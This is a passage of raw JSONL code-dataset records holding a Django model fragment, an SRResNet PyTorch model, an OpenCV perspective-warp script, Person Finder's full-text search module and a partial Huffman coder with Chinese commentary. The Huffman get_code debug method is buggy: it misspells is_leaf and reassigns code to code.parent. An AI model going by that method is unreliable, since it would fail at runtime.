models.ForeignKey(Uzers, on_delete=models.CASCADE)\n    level_winter = models.CharField(max_length=2, default='', choices=difficult_list, blank=True, null=True, verbose_name='зима')\n    level_summer = models.CharField(max_length=2, default='', choices=difficult_list, blank=True, null=True, 
verbose_name='лето')\n\n\n","repo_name":"stuzerg/fstr","sub_path":"fstr/passag/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30384554346","text":"import torch.nn as nn\n\nfrom models.utils import (get_activation_fn, get_same_padding_layer,\n get_normalization_layer, need_bias)\nfrom models.weight_inits import initialize_weights\n\nREQUIRED_PARAMS = [\n 'num_inputs', 'num_outputs', 'upscale_factor'\n]\n\nOPTIONAL_PARAMS = [\n 'num_filters', 'num_res_blocks',\n 'output_activation', 'act_fn', 'relu_leakiness',\n 'use_norm_layers', 'norm_layer', 'padding'\n]\n\n\ndef construct_model(conf, model_name):\n params = conf.to_param_dict(REQUIRED_PARAMS, OPTIONAL_PARAMS)\n model = SRResNet(**params)\n initialize_weights(model, conf.get_attr('weight_init', default={}))\n return model\n\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channels, num_filters, kernel_size, use_norm_layers,\n norm_layer, act_fn, relu_leakiness=None, padding='zero'):\n \"\"\"Builds a residual block\n\n The implementation follows the SRGAN paper, which uses a residual block\n variant which uses no activation after the addition. This design is based\n on Sam Gross & Michael Wilber: \"Training and investigating Residual Nets\"\n (see http://torch.ch/blog/2016/02/04/resnets.html)\n\n Parameters\n ----------\n in_channels : int\n Number of input channels\n num_filters : int\n Number of convolutional filters to use\n kernel_size : int\n Size of convolution kernel\n use_norm_layers : bool\n If true, uses normalization layers after the convolution layers\n norm_layer : string\n Normalization layer to use. `batch` for batch normalization or `instance`\n for instance normalization\n act_fn : string\n Activation function to use. Either `relu`, `prelu` (default), or `lrelu`\n relu_leakiness : float\n If using lrelu, leakiness of the relus, if using prelu, initial value\n for prelu parameters\n padding : string\n Type of padding to use. Either `zero`, `reflection`, or `replication`\n \"\"\"\n super(ResBlock, self).__init__()\n use_bias = need_bias(use_norm_layers, norm_layer)\n modules = [get_same_padding_layer(kernel_size, stride=1, mode=padding),\n nn.Conv2d(in_channels, num_filters, kernel_size=kernel_size,\n stride=1, bias=use_bias)]\n if use_norm_layers:\n modules.append(get_normalization_layer(norm_layer, num_filters))\n\n modules += [get_activation_fn(act_fn, relu_leakiness, num_filters),\n get_same_padding_layer(kernel_size, stride=1, mode=padding),\n nn.Conv2d(num_filters, num_filters, kernel_size=kernel_size,\n stride=1, bias=use_bias)]\n if use_norm_layers:\n modules.append(get_normalization_layer(norm_layer, num_filters))\n\n self.block = nn.Sequential(*modules)\n\n def forward(self, x):\n return self.block(x) + x\n\n\nclass SRResNet(nn.Module):\n DEFAULT_RELU_LEAKINESS = 0.1\n\n def __init__(self, num_inputs, num_outputs, upscale_factor,\n num_filters=64, num_res_blocks=16,\n output_activation='tanh', act_fn='prelu',\n relu_leakiness=DEFAULT_RELU_LEAKINESS,\n use_norm_layers='not-first', norm_layer='batch',\n padding='zero'):\n \"\"\"Builds a SRResNet (Ledig et al, https://arxiv.org/abs/1609.04802)\n\n Parameters\n ----------\n num_inputs : int\n Number of input channels\n num_outputs : int\n Number of output channels\n upscale_factor : int\n Factor by which the network upscales. 
Must be divisible by 2 or 3\n num_filters : int\n Number of convolutional filters to use\n num_res_blocks : int\n Number of residual blocks\n output_activation : string\n Either `softmax` or `tanh`. Activation function to use on the logits\n act_fn : string\n Activation function to use. Either `relu`, `prelu` (default), or `lrelu`\n relu_leakiness : float\n If using lrelu, leakiness of the relus, if using prelu, initial value\n for prelu parameters\n use_norm_layers : bool or string\n If true, use normalization layers. If `not-first`, skip the normalization\n after the first convolutional layer\n norm_layer : string\n Normalization layer to use. `batch` for batch normalization or `instance`\n for instance normalization\n padding : string\n Type of padding to use. Either `zero`, `reflection`, or `replication`\n \"\"\"\n super(SRResNet, self).__init__()\n upscale_factor = int(upscale_factor)\n assert (upscale_factor == 1 or\n upscale_factor % 2 == 0 or\n upscale_factor % 3 == 0)\n in_channels = num_inputs\n\n initial_conv = [get_same_padding_layer(kernel_size=9, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, num_filters, kernel_size=9,\n stride=1,\n bias=need_bias(use_norm_layers, norm_layer)),\n get_activation_fn(act_fn, relu_leakiness, num_filters)]\n in_channels = num_filters\n\n if use_norm_layers != 'not-first' and use_norm_layers:\n initial_conv.append(get_normalization_layer(norm_layer, in_channels))\n elif use_norm_layers == 'not-first':\n use_norm_layers = True\n\n res_blocks = []\n for idx in range(num_res_blocks):\n res_blocks += [ResBlock(in_channels, num_filters, kernel_size=3,\n use_norm_layers=use_norm_layers,\n norm_layer=norm_layer, act_fn=act_fn,\n relu_leakiness=relu_leakiness)]\n\n second_conv = [get_same_padding_layer(kernel_size=3, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, num_filters, kernel_size=3,\n stride=1, bias=need_bias(use_norm_layers,\n norm_layer))]\n in_channels = num_filters\n if use_norm_layers:\n second_conv.append(get_normalization_layer(norm_layer, in_channels))\n\n upsample = []\n if upscale_factor > 1:\n scale = 2 if upscale_factor % 2 == 0 else 3\n for idx in range(upscale_factor // scale):\n upsample += [get_same_padding_layer(kernel_size=3, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, scale * scale * 256,\n kernel_size=3, stride=1, bias=True),\n nn.PixelShuffle(upscale_factor=scale),\n get_activation_fn(act_fn, relu_leakiness, 256)]\n in_channels = 256\n\n final_conv = [get_same_padding_layer(kernel_size=9, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, num_outputs, kernel_size=9,\n stride=1, bias=True)]\n if output_activation != 'none':\n final_conv.append(get_activation_fn(output_activation))\n\n self.initial_conv = nn.Sequential(*initial_conv)\n self.body = nn.Sequential(*(res_blocks + second_conv))\n self.upsample = nn.Sequential(*upsample)\n self.final_conv = nn.Sequential(*final_conv)\n self.output_activation = output_activation\n\n def weight_init_params(self):\n init_params = {\n 'conv_weight': ('orthogonal', 'relu')\n }\n\n # Special case for last convolution\n conv = self.final_conv[1]\n assert isinstance(conv, nn.Conv2d)\n if self.output_activation == 'none':\n init_params[conv] = {'weight': 'orthogonal'}\n else:\n init_params[conv] = {'weight': ('orthogonal', self.output_activation)}\n\n return init_params\n\n def forward(self, x):\n initial = self.initial_conv(x)\n x = self.body(initial)\n x = self.upsample(x + initial)\n x = self.final_conv(x)\n return 
x\n\n","repo_name":"mseitzer/srgan","sub_path":"models/srresnet.py","file_name":"srresnet.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"41700423855","text":"import cv2\nimport numpy as np\n \ntop_left_corner, bottom_right_corner, counter=0,0,0\ncounter = 0\ntop_left_corner=[]\nbottom_right_corner=[]\n\nfrom tkinter import messagebox\n\nix1, iy1 = -1, -1 #a\nix2, iy2 = -1, -1 #b\nix3, iy3 = -1, -1 #c \nix4, iy4 = -1, -1 #d\n\ncolor = (0, 255, 0)\nthickness = 3\n\n# function which will be called on mouse input\ndef drawRectangle(action, x, y, flags, *userdata):\n\n # Mark the top left corner when left mouse button is pressed\n global top_left_corner, bottom_right_corner, counter, a, b, c, d\n global ix1,iy1,ix2,iy2,ix3,iy3,ix4,iy4, color, thickness\n global image \n \n if action == cv2.EVENT_LBUTTONDOWN:\n \n \n top_left_corner = [(x,y)]\n \n if counter==0:\n ix1,iy1 = x,y\n print(\"First point selected: \", ix1, iy1)\n counter+=1\n \n elif counter==1:\n ix2,iy2 = x,y\n print(\"Second point selected: \", ix2, iy2)\n cv2.line(image,(ix1,iy1),(x,y),color,thickness) \n cv2.imshow(\"Window\",image)\n counter+=1\n \n elif counter==2:\n ix3,iy3 = x,y\n print(\"Third point selected: \", ix3, iy3)\n cv2.line(image,(ix2,iy2),(x,y),color,thickness) \n cv2.imshow(\"Window\",image)\n counter+=1\n\n elif counter==3:\n ix4,iy4 = x,y\n print(\"Fourth point selected: \", ix4, iy4)\n cv2.line(image,(ix3,iy3),(x,y),color,thickness)\n cv2.line(image,(x,y),(ix1,iy1),color,thickness)\n cv2.imshow(\"Window\",image)\n counter+=1\n\n elif counter==4:\n counter=0\n print('limite, clique mais uma vez para remcomecar')\n \n image = temp.copy()\n cv2.imshow(\"Window\", image)\n \n messagebox.showinfo('Aviso', \\\n 'Clique mais uma vez para reiniciar')\n\n ix1, iy1 = -1, -1 #a\n ix2, iy2 = -1, -1 #b\n ix3, iy3 = -1, -1 #c \n ix4, iy4 = -1, -1 #d\n \n #print(counter) qtd de vezes \n \ndef normalize_pixel_value(pixel_value, min_pixel_value, max_pixel_value):\n normalized_value = (pixel_value - min_pixel_value) / (max_pixel_value - min_pixel_value)\n return round(normalized_value, 16)\n \n\nimage = cv2.imread(\"../imgs/sample_unball.png\")\n\nscale_percent = 30\nwidth = int(image.shape[1] * scale_percent / 100)\nheight = int(image.shape[0] * scale_percent / 100)\ndim = (width, height)\nimage = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\n\ntemp = image.copy()\n\ncv2.namedWindow(\"Window\")\ncv2.setMouseCallback(\"Window\", drawRectangle)\n\nk=0\n\nwhile k!=113:\n # Display the image\n cv2.imshow(\"Window\", image)\n k = cv2.waitKey(0)\n # If c is pressed, clear the window, using the dummy image\n if (k == 99):\n image = temp.copy()\n counter = 0\n messagebox.showinfo('Aviso', \\\n 'Reiniciando')\n cv2.imshow(\"Window\", image)\n\n elif k == ord('w') and ix4 != -1 and iy4 != -1:\n\n messagebox.showinfo('WARPING', \\\n 'WARPING')\n \n dst_pts = np.array([[0,0],[image.shape[1]-1,0],[image.shape[1]-1,image.shape[0]-1],[0,image.shape[0]-1]], dtype=np.float32)\n src_pts = np.array([[ix1,iy1],[ix2,iy2],[ix3,iy3],[ix4,iy4]], dtype=np.float32)\n \n height, width, _ = image.shape\n \n base = np.array([[0,0],[1,0],[1,1],[0,1]])\n \n #[(0.1289304826416534, 0.22905718122209823), (0.6941748617054804, 0.19912401471819197), (0.6305899650427946, 0.697082257952009), (0.10528110901008493, 0.7111135428292411)]\n src_pts_malp = []\n \n for i in src_pts:\n x = normalize_pixel_value(i[0],0,image.shape[1])\n y = 
normalize_pixel_value(i[1],0,image.shape[0])\n            src_pts_malp.append((x,y))\n        \n        key_points = np.array(src_pts_malp) * np.array([width, height])\n        frame_points = base * np.array([width, height])\n        \n        M = cv2.getPerspectiveTransform(src_pts,dst_pts)\n        h, mask = cv2.findHomography(key_points, frame_points, cv2.RANSAC)\n        # either transform works below: h from findHomography, M from getPerspectiveTransform\n        \n        print(h)\n        print(M)\n        \n        image = cv2.warpPerspective(image, h, (image.shape[1], image.shape[0]))\n        #image = cv2.warpPerspective(image,M,(image.shape[1],image.shape[0]))\n\n    \ncv2.destroyAllWindows()","repo_name":"RaulMyron/visao_estudos","sub_path":"calibrating/calibrating.py","file_name":"calibrating.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"36359587570","text":"import logging\nimport re\n\nfrom google.appengine.api import search as appengine_search\n\nimport model\nimport script_variant\n\n# The index name for full text search.\n# This index contains person name and location.\nPERSON_LOCATION_FULL_TEXT_INDEX_NAME = 'person_location_information'\n\nROMANIZE_METHODS = [script_variant.romanize_word_by_unidecode,\n                    script_variant.romanize_japanese_word,\n                    script_variant.romanize_chinese_name]\n\n# This is for ranking (person name match higher than location)\nREPEAT_COUNT_FOR_RANK = 5\n\n\ndef create_sort_expressions():\n    \"\"\"\n    Creates SortExpression's for ranking.\n    Returns:\n        array of SortExpression\n    \"\"\"\n    return [appengine_search.SortExpression(\n        expression='_score',\n        direction=appengine_search.SortExpression.DESCENDING,\n        default_value=0.0\n    )]\n\n\ndef enclose_in_parenthesis(query_txt):\n    \"\"\"\n    Encloses each comma-separated term of query_txt in parentheses,\n    joined with AND.\n    Args:\n        query_txt: Search query\n    Returns:\n        '(query_word1) AND (query_word2) ...'\n    \"\"\"\n    query_words = query_txt.split(',')\n    return '(' + ') AND ('.join([word for word in query_words if word]) + ')'\n\n\ndef enclose_in_double_quotes(query_txt):\n    \"\"\"\n    Encloses query_txt in double quotes.\n    Args:\n        query_txt: Search query\n    Returns:\n        '\"query_word1\"'\n    \"\"\"\n    return '\"' + query_txt + '\"'\n\n\ndef create_non_romanized_query(query_txt):\n    \"\"\"\n    Creates non romanized query txt.\n    Args:\n        query_txt: Search query\n    Returns:\n        '\"query_word1\" \"query_word2\" ...'\n    \"\"\"\n    query_words = query_txt.split(' ')\n    return ' '.join(enclose_in_double_quotes(word) for word in query_words)\n\n\ndef create_romanized_query_txt(query_txt):\n    \"\"\"\n    Applies romanization to each word in query_txt.\n    Args:\n        query_txt: Search query\n    Returns:\n        romanized query_txt, with the variants of each word OR-ed together\n    \"\"\"\n    query_words = query_txt.split(' ')\n    query_list = []\n    for word in query_words:\n        romanized_word_list = script_variant.romanize_search_query(word)\n        romanized_word = ' OR '.join(enclose_in_double_quotes(word)\n                                     for word in romanized_word_list)\n        query_list.append(romanized_word)\n    romanized_query = ','.join([word for word in query_list])\n    return enclose_in_parenthesis(romanized_query)\n\n\ndef is_query_match(query_txt, romanized_values):\n    \"\"\"\n    Checks if a query matches a record.\n    It should be called in get_person_ids_from_results method.\n    Args:\n        query_txt: Search query\n        romanized_values: field values\n    Returns:\n        Boolean\n    \"\"\"\n    # empty matches everything\n    if not query_txt:\n        return True\n\n    romanized_query_list = (script_variant.romanize_search_query(query_txt))\n\n    # A query matches a record if all search_terms appear in the record\n    for search_terms in 
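A minimal sketch of the warp calibrating.py performs once four corners are clicked; the corner coordinates here are arbitrary stand-ins for the mouse input.

```python
# Map four clicked source points onto the full output rectangle.
import cv2
import numpy as np

src = np.array([[50, 40], [580, 60], [560, 430], [70, 410]], dtype=np.float32)
dst = np.array([[0, 0], [639, 0], [639, 479], [0, 479]], dtype=np.float32)

M = cv2.getPerspectiveTransform(src, dst)
image = np.zeros((480, 640, 3), dtype=np.uint8)   # stand-in for the camera frame
warped = cv2.warpPerspective(image, M, (640, 480))
print(M.shape, warped.shape)                      # (3, 3) (480, 640, 3)
```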
romanized_query_list:\n words = search_terms.split(\" \")\n for word_index, word in enumerate(words):\n if not re.search(word, \" \".join(romanized_values), re.I):\n break\n if word_index == len(words) - 1:\n return True\n return False\n\n\ndef get_person_ids_from_results(\n query_dict, results_list, romanized_name_fields, romanized_location_fields):\n \"\"\"\n Returns person record_id of persons\n whose name contain in romanized_name_query and\n location contain in romanized_location_query.\n We use is_query_match to check if romanized_querys match\n at least a part of person name and location.\n To protect users' privacy, we should not return records\n which match location only.\n It also removes dups.\n (i.e., If results_list contains multiple results with the same index_results,\n it returns just one of them)\n \"\"\"\n name_query_txt = query_dict.get('name', '')\n location_query_txt = query_dict.get('location', '')\n\n index_results = []\n added_results = set()\n for results in results_list:\n for document in results:\n fields = {field.name: field.value for field in\n document.fields}\n\n record_id = fields['record_id']\n\n # use set to faster the speed.\n # average time complexity: set-O(1) list-O(n)\n if record_id in added_results:\n continue\n\n romanized_names = [value for name, value in fields.items()\n if name in romanized_name_fields]\n romanized_locations = [value for name, value in fields.items()\n if name in romanized_location_fields]\n\n if (is_query_match(name_query_txt, romanized_names) and\n is_query_match(location_query_txt, romanized_locations)):\n index_results.append(record_id)\n added_results.add(record_id)\n return index_results\n\n\ndef search(repo, query_dict, max_results):\n \"\"\"\n Searches person with index.\n Query_txt must match at least a part of person name.\n (It's not allowed to search only by location.)\n Args:\n repo: The name of repository\n query_dict: Search query dict, {name: name_query, location: location_query}\n max_results: The max number of results you want.(Maximum: 1000)\n Returns:\n - Array of in datastore\n - []: If query_txt doesn't contain a part of person name\n Raises:\n search.Error: An error occurred when the index name is unknown\n or the query has syntax error.\n \"\"\"\n name = query_dict.get('name', '')\n location = query_dict.get('location', '')\n if not name:\n return []\n\n # Order does not matter\n query_list= [name, location]\n query_list_cleaned = query_list if location else [name]\n\n # Remove double quotes so that we can safely apply\n # enclose_in_double_quotes().\n for index, query in enumerate(query_list_cleaned):\n query_list_cleaned[index] = re.sub('\"', '', query)\n\n romanized_query_list = [create_romanized_query_txt(query)\n for query in query_list_cleaned]\n non_romanized_query_list = [create_non_romanized_query(query)\n for query in query_list_cleaned]\n\n # search and sort options\n person_location_index = appengine_search.Index(\n name=PERSON_LOCATION_FULL_TEXT_INDEX_NAME)\n expressions = create_sort_expressions()\n sort_opt = appengine_search.SortOptions(\n expressions=expressions, match_scorer=appengine_search.MatchScorer())\n\n\n # Define the fields need to be returned per romanzie method\n returned_name_fields = [u'names_romanized_by_' + method.__name__\n for method in ROMANIZE_METHODS]\n\n returned_location_fields = [u'full_location_romanized_by_' + method.__name__\n for method in ROMANIZE_METHODS]\n\n returned_fields = (returned_name_fields +\n returned_location_fields + ['record_id'])\n\n options = 
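# --- Editor's illustrative sketch (not part of the record above) ---
# get_person_ids_from_results() above dedupes record ids while keeping the
# order in which they were first seen, using a set for O(1) average membership
# tests instead of scanning a list. The same pattern in isolation:

def dedupe_keep_order(items):
    seen = set()
    out = []
    for item in items:
        if item in seen:
            continue  # O(1) average lookup, vs O(n) for `item in out`
        seen.add(item)
        out.append(item)
    return out

assert dedupe_keep_order(['a', 'b', 'a', 'c', 'b']) == ['a', 'b', 'c']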
appengine_search.QueryOptions(\n limit=max_results,\n sort_options=sort_opt,\n returned_fields=returned_fields)\n\n # enclose_in_double_quotes is used for avoiding query_txt\n # which specifies index field name, contains special symbol, ...\n # (e.g., \"repo: repository_name\", \"test: test\", \"test AND test\").\n and_query = ' AND '.join(\n romanized_query_list) + ' AND (repo: ' + repo + ')'\n person_location_index_results = person_location_index.search(\n appengine_search.Query(\n query_string=and_query, options=options))\n\n # To rank exact matches higher than\n # non-exact matches with the same romanization.\n non_romanized_and_query = (' AND '.join(non_romanized_query_list)\n + ' AND (repo: ' + repo + ')')\n non_romanized_person_location_index_results = (\n person_location_index.search(appengine_search.Query(\n query_string=non_romanized_and_query, options=options)))\n\n results_list = [non_romanized_person_location_index_results,\n person_location_index_results]\n\n index_results = get_person_ids_from_results(query_dict,\n results_list, returned_name_fields, returned_location_fields)\n\n results = []\n for record_id in index_results:\n result = model.Person.get(repo, record_id, filter_expired=True)\n if result:\n results.append(result)\n return results\n\n\ndef create_fields_for_rank(field_name, values):\n \"\"\"\n Creates fields for ranking. (person name match > location match)\n MatchScorer class(assigns score) doesn't support to assign\n a score based on term frequency in a field.\n So we add 5 fields for each name params.\n Args:\n field_name: field name\n values: field values\n Returns:\n array of appengine_search.TextField(name=field_name, value=value)\n (length: REPEAT_COUNT_FOR_RANK)\n \"\"\"\n if not values:\n return []\n\n fields = []\n for index, value in enumerate(values):\n for x in xrange(REPEAT_COUNT_FOR_RANK):\n fields.append(\n appengine_search.TextField(name='%s_%d_for_rank_%d' % (\n field_name, index, x),\n value=value))\n return fields\n\n\ndef create_full_name_list_without_space(given_names, family_names):\n \"\"\"\n Creates full name list without white space.\n Returns:\n ['given_name + family_name',\n 'family_name + given_name',...]\n \"\"\"\n full_names = []\n for given_name in given_names:\n for family_name in family_names:\n full_names.append(given_name + family_name)\n full_names.append(family_name + given_name)\n return full_names\n\n\ndef create_full_name_without_space_fields(romanize_method, given_name,\n family_name):\n \"\"\"\n Creates fields with the full name without white spaces.\n Returns:\n fullname fields, romanized_name_list: (for check)\n \"\"\"\n fields = []\n romanized_name_list = []\n romanized_given_names = romanize_method(given_name)\n romanized_family_names = romanize_method(family_name)\n romanize_method_name = romanize_method.__name__\n full_names = create_full_name_list_without_space(\n romanized_given_names, romanized_family_names)\n for index, full_name in enumerate(full_names):\n fields.append(appengine_search.TextField(\n name='no_space_full_name_romanized_by_%s_%d' % (\n romanize_method_name, index),\n value=full_name))\n romanized_name_list.append(full_name)\n return fields, romanized_name_list\n\n\ndef create_romanized_name_fields(romanize_method, **kwargs):\n \"\"\"\n Creates romanized name fields (romanized by romanize_method)\n for full text search.\n \"\"\"\n fields = []\n romanized_names_list = []\n romanize_method_name = romanize_method.__name__\n\n for field_name, field_value in kwargs.iteritems():\n romanized_names = 
romanize_method(field_value)\n for index, romanized_name in enumerate(romanized_names):\n fields.extend(create_fields_for_rank('%s_romanized_by_%s_%d' %\n (field_name,\n romanize_method_name,\n index),\n romanized_name))\n romanized_names_list.extend(romanized_names)\n\n full_name_fields, romanized_full_names = (\n create_full_name_without_space_fields(\n romanize_method, kwargs['given_name'], kwargs['family_name']))\n fields.extend(full_name_fields)\n romanized_names_list.extend(romanized_full_names)\n\n names = ':'.join([name for name in romanized_names_list if name])\n fields.append(\n appengine_search.TextField(\n name='names_romanized_by_' + romanize_method_name,\n value=names))\n\n return fields\n\n\ndef create_romanized_location_fields(romanize_method, **kwargs):\n \"\"\"\n Creates romanized location fields (romanized by romanize_method)\n for full text search.\n \"\"\"\n fields = []\n romanize_method_name = romanize_method.__name__\n for field in kwargs:\n romanized_locations = romanize_method(kwargs[field])\n for index, romanized_location in enumerate(romanized_locations):\n fields.append(\n appengine_search.TextField(\n name='%s_romanized_by_%s_%d' % (\n field, romanize_method_name, index),\n value=romanized_location)\n )\n full_romanized_location = ':'.join(\n location.value for location in fields if location.value)\n fields.append(appengine_search.TextField(\n name='full_location_romanized_by_' + romanize_method_name,\n value=full_romanized_location))\n return fields\n\n\ndef create_non_romanized_fields(**kwargs):\n \"\"\"\n Creates non romanized fields to rank exact matches higher than\n non-exact matches with the same romanization.\n e.g.,\n if there are records record1:[name=菊地真], record2:[name=菊地眞],\n get results(1st: 菊地真、2nd: 菊地眞) when search by \"菊地 真\"\n \"\"\"\n fields = []\n for field_name in kwargs:\n fields.append(appengine_search.TextField(\n name=field_name, value=kwargs[field_name]))\n return fields\n\n\ndef create_document(person):\n \"\"\"\n Creates document for full text search.\n It should be called in add_record_to_index method.\n \"\"\"\n fields = []\n\n # Add repo and record_id to fields\n repo = person.repo\n record_id = person.record_id\n doc_id = repo + ':' + record_id\n fields.append(appengine_search.TextField(name='repo', value=repo))\n fields.append(\n appengine_search.TextField(name='record_id', value=record_id))\n\n fields.extend(create_non_romanized_fields(\n given_name=person.given_name,\n family_name=person.family_name,\n full_name=person.full_name,\n alternate_names=person.alternate_names,\n home_city=person.home_city,\n home_state=person.home_state,\n home_postal_code=person.home_postal_code,\n home_neighborhood=person.home_neighborhood,\n home_country=person.home_country))\n\n # Applies two methods because kanji is used in Chinese and Japanese,\n # and romanizing in chinese and japanese is different.\n\n for romanize_method in ROMANIZE_METHODS:\n fields.extend(create_romanized_name_fields(\n romanize_method,\n given_name=person.given_name,\n family_name=person.family_name,\n full_name=person.full_name,\n alternate_names=person.alternate_names))\n fields.extend(create_romanized_location_fields(\n romanize_method,\n home_city=person.home_city,\n home_state=person.home_state,\n home_postal_code=person.home_postal_code,\n home_neighborhood=person.home_neighborhood,\n home_country=person.home_country))\n\n return appengine_search.Document(doc_id=doc_id, fields=fields)\n\n\ndef add_record_to_index(person):\n \"\"\"\n Adds person record to index.\n 
Raises:\n search.Error: An error occurred when the document could not be indexed\n or the query has a syntax error.\n \"\"\"\n person_location_index = appengine_search.Index(\n name=PERSON_LOCATION_FULL_TEXT_INDEX_NAME)\n person_location_index.put(create_document(person))\n\n\ndef delete_record_from_index(person):\n \"\"\"\n Deletes person record from index.\n Args:\n person: Person who should be removed\n Raises:\n search.Error: An error occurred when the index name is unknown\n or the query has a syntax error.\n \"\"\"\n doc_id = person.repo + ':' + person.record_id\n person_location_index = appengine_search.Index(\n name=PERSON_LOCATION_FULL_TEXT_INDEX_NAME)\n person_location_index.delete(doc_id)\n","repo_name":"google/personfinder","sub_path":"app/full_text_search.py","file_name":"full_text_search.py","file_ext":"py","file_size_in_byte":16040,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"37"} +{"seq_id":"12040696437","text":"#### 哈夫曼算法\n\n'''\n霍夫曼编码是一种使用变长编码表编码源符号的无损压缩算法。它的核心思想是计算各个符号的权重,出现次数较多的符号拥有较大的权重,出现次数较少的符号拥有较小的权重。然后对符号进行前缀编码,用较短的编码表示拥有较长权重的符号,用较长的编码表示拥有较短权重的符号。这样,总体来说,对于符号出现次数不均衡的序列,霍夫曼编码就能够拥有较好的表现。\n\n压缩过程\n霍夫曼编码的压缩阶段主要有以下几个步骤:\n\n读入符号,计算各��符号的权重。\n根据符号的权重建立霍夫曼树。\n依据霍夫曼树建立编码表。\n压缩\n计算权重\n计算权重很容易理解。遍历符号,计算各个符号出现的次数。把出现的次数当作权重即可。实际实现中,如果以字节为单位压缩,考虑到一个字节有8位,最大能表示255。为了操作方便,可以将出现的次数除以最大的出现次数,再乘以256当作权重。这样,所有权重就刚分布在一个字节的表示范围以内。\n\n同时,考虑到一个字节的编码刚好是0~255,可以建立一个数组,这个数组的下标表示对应的符号,这个数组的值表示符号的权重。\n\n\n计算了各个符号的权重之后,就可以根据这些权重建立霍夫曼树。从霍夫曼树中,我们可以得到符号的前缀码表。\n\n建立霍夫曼树\n霍夫曼树是一颗二叉树,其每个节点至少有四个值——符号,权重,左树指针,右树指针。建立霍夫曼树主要有两种方式。第一种是使用一个优先队列(堆)。首先,为所有的符号创造一个节点,储存进这个符号本身和它的权重。然后将所有的节点压入优先队列,拥有最低权重的节点拥有最高的优先级(即,低权重的节点会先被弹出。)然后执行以下步骤:\n\n如果优先队列中的元素大于一,弹出两个节点。以这两个节点为左右指针创建一颗新的霍夫曼树,其权重为作为节点之和。将这个新树压入优先队列。重复本步骤。\n否则,弹出剩下的元素作为最终的霍夫曼树。\n除了优先队列外,还可以使用两个队列来建立霍夫曼树。首先,像前面那样创建节点,按照权重排序所有节点。然后创建两个队列,将节点按照权重从低到高的顺序依次入其中一个队列1。然后执行以下步骤:\n\n如果一个队列为空,从另一个队列中弹出两个元素;否则,比较两个队列首元素的权重,弹出权重最小的两个元素。用这两个元素作为子树建立一个新的霍夫曼树,其权重为两元素权重之和。将这颗新树压入队列2。重复本步骤,直到队列只剩下一个元素。\n弹出这个元素作为最终的霍夫曼树。\n\n建立编码表\n根据得到的霍夫曼树,我们可以为符号建立一组前缀码。\n\n如果一组编码,其中任意一个编码都不为另一个编码的前缀,那么我们就称这组编码为一组前缀码。将符号使用前缀码编码是极有意义的。这意味着,对于一组编码,我们可以不借助任何分割符解码其中的每一个符号。即,此时,这组编码是唯一可解的。\n\n前面说过,霍夫曼树是一颗二叉树。因此,这颗二叉树的所有叶子节点的路径组成的编码即为一组前缀码。把左子树编码为0,将右子树编码为1。\n\n\n压缩\n把符号按照编码表替换为相应为即可。\n\n如果用C语言实现,可以方便地直接对内存进行位操作。而Python的位操作比较麻烦。因此,可以先将所有二进制编码先视为字符串,然后每8位字符串转换为一个16进制数,转换为python中的bytes类型,直接写入文件即可。\n\n将符号频率同编码一同写入文件,就可以在之后通过读取频率来解压。\n\n\n解压过程\n解压过程较简单,是前面压缩过程的逆操作。\n\n首先读取符号频率,根据符号频率建立霍夫曼树,然后再根据霍夫曼树解压编码即可。\n\n'''\n\nimport heapq\n\n\nclass HuffmanNode:\n def __init__(self, symbol=None, freq=None):\n self.symbol = symbol\n self.freq = freq\n self.parent = None\n self.left = None\n self.right = None\n\n def __lt__(self, other):\n return self.freq < other.freq\n\n def is_leaf(self):\n return not self.left and not self.right\n\n def get_code(self):\n # 调试用\n if not self.is_laef():\n raise ValueError(\"Not a leaf node.\")\n\n code = ''\n node = self\n while node.parent:\n if node.parent.left == node:\n code = '0' + code\n else:\n code = '1' + code\n code = code.parent\n\n return code\n\n\nclass Huffman:\n BYTE_MAX_NUM = 255\n\n def __init__(self):\n self.origin = None\n self.compressed = None\n self.huffman_tree = None\n self.freqs = [0 for _ in range(self.BYTE_MAX_NUM + 1)]\n self.coding_table = [0 for _ in range(self.BYTE_MAX_NUM + 1)]\n self.reverse_table = {}\n self.coding_str = ''\n\n def _minimize_frequencies(self):\n # 缩小字频使其在一个字节范围以内\n max_freq = max(self.freqs)\n\n for symbol, freq in enumerate(self.freqs):\n scale_freq = 
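# --- Editor's illustrative sketch (not part of the record above) ---
# The Huffman write-up above describes two ways to build the tree; the class
# in this record uses a heap, so here is the alternative two-queue
# construction from the prose: leaves enter queue 1 sorted by weight, merged
# subtrees enter queue 2, and each step pops the two lightest fronts across
# both queues until one tree remains. Nodes are (weight, symbol, left, right)
# tuples for brevity.

from collections import deque

def build_huffman_two_queues(freqs):  # freqs: {symbol: weight}
    q1 = deque(sorted((w, s, None, None) for s, w in freqs.items()))
    q2 = deque()

    def pop_lightest():
        if not q1:
            return q2.popleft()
        if not q2 or q1[0][0] <= q2[0][0]:
            return q1.popleft()
        return q2.popleft()

    while len(q1) + len(q2) > 1:
        a = pop_lightest()
        b = pop_lightest()
        q2.append((a[0] + b[0], None, a, b))  # internal node, weight = sum
    return pop_lightest()

root = build_huffman_two_queues({'a': 5, 'b': 2, 'c': 1, 'd': 1})
assert root[0] == 9  # the root carries the total weight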
